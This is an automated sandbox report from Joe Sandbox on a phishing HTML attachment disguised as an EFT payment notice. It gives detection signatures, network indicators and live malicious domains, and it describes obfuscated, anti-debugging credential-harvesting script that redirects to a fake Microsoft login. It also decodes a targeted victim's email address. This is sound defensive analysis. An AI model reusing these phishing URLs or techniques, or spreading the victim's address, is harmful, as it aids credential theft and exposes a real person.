Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EFT_Payment_Notification_Gheenirrigation.html

Overview

General Information

Sample name:EFT_Payment_Notification_Gheenirrigation.html
Analysis ID:1591167
MD5:d75342c879f7c2ceb6aa59cfe6b5e744
SHA1:2de570a9f80fb769d5cbf35a84bff863b6b558c3
SHA256:2e85dd387130ff6c4ff3afa282d76e04be636551c4a7b029dd74108708f71f38
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish44
Yara detected HtmlPhish54
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML IFrame injector detected
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\EFT_Payment_Notification_Gheenirrigation.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1972,i,4320685282220284135,10704832853524411425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_72JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: dropped/chromecache_72, type: DROPPED
      Source: Yara matchFile source: 1.4.pages.csv, type: HTML
      Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicates a high risk of malicious intent.
      Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (login.microsoftonline.com). The script also uses a setInterval loop to repeatedly trigger a debugger statement, which could be an attempt to detect and evade analysis. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security risk.
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/EFT_Payment_Notifica... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses `eval` to execute a base64-encoded string, which could potentially execute remote or malicious code. It also appears to be collecting and sending user data to an unknown domain, which poses a risk of data exfiltration. Additionally, the script uses heavily obfuscated code, making it difficult to analyze and understand its true purpose. While the script may have a legitimate purpose, the combination of these high-risk indicators suggests a high likelihood of malicious intent.
      Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l9y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycm... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
      Source: EFT_Payment_Notification_Gheenirrigation.htmlHTTP Parser: Low number of body elements: 1
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: New IFrame, src: https://l9Y1.yordickyel.ru/16E/#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: New script tag found
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: New script tag found
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tTab title: EFT_Payment_Notification_Gheenirrigation.html
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: Number of links: 0
      Source: EFT_Payment_Notification_Gheenirrigation.htmlHTTP Parser: Base64 decoded: tami@gheenirrigation.com
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: Title: Redirecting does not match URL
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: Has password / email / username input fields
      Source: EFT_Payment_Notification_Gheenirrigation.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:51954 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 0MB later: 31MB
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:51952 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: l9y1.yordickyel.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: sd6vh7mfnilndncuh6xtxkmnhwmzi5tpdbaakfm83uqfkrnvtkgse2ld4.mentespic.ru
      Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
      Source: global trafficDNS traffic detected: DNS query: www.office.com
      Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51954
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51958
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 51954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:51954 version: TLS 1.2

      System Summary

      barindex
      Source: Name includes: EFT_Payment_Notification_Gheenirrigation.htmlInitial sample: payment
      Source: classification engineClassification label: mal92.phis.evad.winHTML@18/14@28/218
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\EFT_Payment_Notification_Gheenirrigation.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1972,i,4320685282220284135,10704832853524411425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1972,i,4320685282220284135,10704832853524411425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown

      Data Obfuscation

      barindex
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

      Stealing of Sensitive Information

      barindex
      Source: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29tHTTP Parser: file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      l9y1.yordickyel.ru
      172.67.198.166
      truetrue
        unknown
        code.jquery.com
        151.101.2.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                www.google.com
                142.250.185.132
                truefalse
                  high
                  sd6vh7mfnilndncuh6xtxkmnhwmzi5tpdbaakfm83uqfkrnvtkgse2ld4.mentespic.ru
                  188.114.97.3
                  truefalse
                    unknown
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      identity.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        login.microsoftonline.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          file:///C:/Users/user/Desktop/EFT_Payment_Notification_Gheenirrigation.html#dGFtaUBnaGVlbmlycmlnYXRpb24uY29ttrue
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.185.99
                          unknownUnited States
                          15169GOOGLEUSfalse
                          13.107.6.156
                          unknownUnited States
                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          1.1.1.1
                          unknownAustralia
                          13335CLOUDFLARENETUSfalse
                          108.177.15.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          172.67.198.166
                          l9y1.yordickyel.ruUnited States
                          13335CLOUDFLARENETUStrue
                          13.107.246.45
                          s-part-0017.t-0009.t-msedge.netUnited States
                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          172.217.18.14
                          unknownUnited States
                          15169GOOGLEUSfalse
                          104.18.94.41
                          challenges.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          142.250.185.132
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          104.18.95.41
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          2.19.126.89
                          unknownEuropean Union
                          16625AKAMAI-ASUSfalse
                          142.250.185.238
                          unknownUnited States
                          15169GOOGLEUSfalse
                          20.190.159.75
                          unknownUnited States
                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          151.101.2.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          188.114.97.3
                          sd6vh7mfnilndncuh6xtxkmnhwmzi5tpdbaakfm83uqfkrnvtkgse2ld4.mentespic.ruEuropean Union
                          13335CLOUDFLARENETUSfalse
                          142.250.186.132
                          unknownUnited States
                          15169GOOGLEUSfalse
                          151.101.194.137
                          unknownUnited States
                          54113FASTLYUSfalse
                          172.217.16.195
                          unknownUnited States
                          15169GOOGLEUSfalse
                          104.17.25.14
                          cdnjs.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          IP
                          192.168.2.17
                          192.168.2.16
                          192.168.2.4
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591167
                          Start date and time:2025-01-14 18:40:27 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:EFT_Payment_Notification_Gheenirrigation.html
                          Detection:MAL
                          Classification:mal92.phis.evad.winHTML@18/14@28/218
                          Cookbook Comments:
                          • Found application associated with file extension: .html
                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.185.238, 108.177.15.84, 142.250.186.78, 216.58.206.46, 142.250.185.206, 217.20.57.34
                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: l9y1.yordickyel.ru
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:40:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.98456232747184
                          Encrypted:false
                          SSDEEP:
                          MD5:1E0C78A6BEE886A5A9E102A699A2796C
                          SHA1:3E6E8F405E5DB11BB83D24FCE441C691B4CD81D3
                          SHA-256:F9F9466CE4EF2D9073903903E0C8E034D173205A3EA69E54AD350C7B6823AF44
                          SHA-512:C8B05CD9639BB3362A8469A7458CA5F5B68BEC2EFD5C43C4DA8EBF676A9EFF236A2BB33A06B4E5CBE8112163695330AEF17BF6CF076B2B24DCB2B22B03532B0A
                          Malicious:false
                          Reputation:unknown
